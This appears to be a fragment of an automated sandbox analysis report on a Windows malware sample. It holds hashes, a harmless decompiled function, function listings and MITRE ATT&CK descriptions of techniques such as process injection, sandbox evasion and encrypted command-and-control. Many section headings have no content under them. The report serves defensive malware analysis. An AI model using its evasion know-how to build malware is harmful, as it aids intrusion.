Opcode Fuzzy Hash: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction Fuzzy Hash: E1118F70A00200BFC7309F59EE45D227BB5FB9A728711493EEA51E75B0C771995ACF18

Uniqueness

Uniqueness Score: -1.00%

Function 004052B0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052B0(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x40c2b4);
				InitializeCriticalSection( *0x40c2a4);
				InitializeCriticalSection( *0x40c294);
				InitializeCriticalSection( *0x40c274);
				return _t1;
			}

0x004052b0
0x004052bd
0x004052c5
0x004052cd
0x004052d5
0x004052d8

APIs

InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052BD
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052C5
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052CD
InitializeCriticalSection.KERNEL32(?,00403252,?,004026EE), ref: 004052D5

Memory Dump Source

Source File: 00000000.00000002.648113668.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.648110301.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648119163.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648142737.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648146970.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648151672.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction ID: c45305cb3e823c81d6ea6f37651147a6e0c3b892bf36741c7ff915a60156b057
Opcode Fuzzy Hash: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction Fuzzy Hash: AFC00231C01035DBCE123BA5FF858463F26EB0526070502BBA108718308A711C11DFC8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report LRios3pM39

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Function 0040267E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Function 004053B0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Function 00403AA1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Function 00403420, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00403DD2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 004028DE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Function 004048ED, Relevance: .3, Instructions: 259
COMMONCrypto

Function 00401FD0, Relevance: 73.6, APIs: 3, Strings: 39, Instructions: 97
stringCOMMON

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Function 00406967, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Function 004065BF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 00406BB6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Function 00403F49, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 0040396F, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Function 00403C8A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Function 004076E0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Function 004032B3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Function 00406A7B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00407304, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Function 00404BE3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Function 00405CFE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Function 00406CB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Function 00404741, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Function 004052B0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON